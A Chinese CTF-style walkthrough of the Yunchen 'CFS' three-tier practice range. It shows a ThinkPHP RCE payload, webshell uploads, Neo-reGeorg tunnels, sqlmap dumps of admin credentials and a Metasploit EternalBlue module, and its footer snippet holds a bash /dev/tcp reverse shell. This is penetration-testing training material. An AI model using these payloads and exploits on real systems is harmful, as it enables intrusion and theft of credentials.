云尘靶场--CFS三层靶机

2024-02-23 23:52
文章标签 靶场 三层 靶机 cfs 云尘

本文主要是介绍云尘靶场--CFS三层靶机,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

先扫c段

windows上好像挂着vpn nmap不能扫

直接fscan了

可以看到172.25.0.13存活  存在ftp、ssh、http等端口 漏洞也有了

先不急 访问一下网站

172.25.0.13

http://172.25.0.13/

直接拿thinkphp漏扫工具来扫一下

有poc可以直接利用

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

发现可以利用

用工具爽的很

用命令执行

可以看到

第一个flag

然后直接getshell拿下

检查一下看看

蚁剑连接成功了

 第二个flag

第三个flag

/www/wwwroot/ThinkPHP/public/flag21sA.txt

 然后先信息收集一波

查内核
uname -r
查ip
ifconfig
ip a
查端口
netstat -ntlp
查进程
ps -ef
查路由
route翻翻目录、文件

ifconfig

 下面建立代理 很久没用不太熟练了

这里使用neo-regeorg

先上传tunnel.php到网站根目录

检查一下

然后建立sock5代理

neoreg.py -k a  -u http://172.25.0.13/tunnel.php

chmod 777 fscan_amd64./fscan_amd64

 扫到192.168.22.22

192.168.22.22

 查看/robots.txt

根据提示可以找到登录界面http://192.168.22.22/index.php?r=admini/public/login

查看源代码看到有hint

1.数据库查询 

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch --dbs --proxy=socks5://127.0.0.1:1080

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch -D bagecms --tables  --proxy=socks5://127.0.0.1:1080

 

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin --columns  --proxy=socks5://127.0.0.1:1080

 

 

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin -C username,password --dump --proxy=socks5://127.0.0.1:1080

用爆出的账号密码登录

进去就得到flag

在模板里面插入一句话木马

 蚁剑设置代理sock5

尝试连接

 

flag{23ASfqwr4t2e} 

ifconfig

 

T1中上传neo

解压unzip Neo-reGeorg-5.1.0.zip

在192.168.22.22中上传tunnel.php

检查一下

可以先查看一下能不能用python 有没有python环境

然后开启代理

 python neoreg.py -k a -u http://192.168.22.22/tunnel.php -l 0.0.0.0 -p 2000

192.168.33.33

nmap扫描33网段 

proxychains4 nmap -Pn -sT 192.168.33.0/24

 发现这是开放着445、3389端口的Windows系统

那应该是永恒之蓝

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
options
run

 type查看flag.txt

这篇关于云尘靶场--CFS三层靶机的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/740333

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

设计之道:ORM、DAO、Service与三层架构的规范探索

引言: 实际开发中,遵守一定的开发规范,不仅可以提高开发效率,还可以提高项目的后续维护性以及项目的扩展性;了解一下本博客的项目设计规范,对项目开发很有意义 一、ORM思想 ORM(Object-Relational-Mapping)在对象模型和关系型模型之间做一个映射(转换)。 目的是为了解决面向对象编程语言的发展和关系型数据库的发展不匹配的问题 可以理解为: 将Java中的数据结

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Mysql+IIS+三层架构创建网站遇到的过程总结

一.三层架构的创建 1)添加新项,添加类库:实体,业务逻辑,数据库访问,并将新创建的类库添加到网站的引用。 2)为实体类库设置属性,并设置set和get方法。 3)为数据库访问类库新建Connection和DataService类,其中Connection类中包含了数据库连接字符串成员变量以及设置方法,DataService类是数据库操作类,包含了各种数据库的操作,在DataService类

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

tomato靶机通关攻略

主机发现  用kali去扫描端口,发现有3个开放端口 访问网站    在kali里面进行目录扫描,找到一个antibot_image   找到一个/antibot_image/ 目录,进而找到/antibots/目录  发现可能存在文件包含    页面通过image传参查看passwd文件  页面通过image传参查看日志文件   将一句话木马作为ssh登录的用户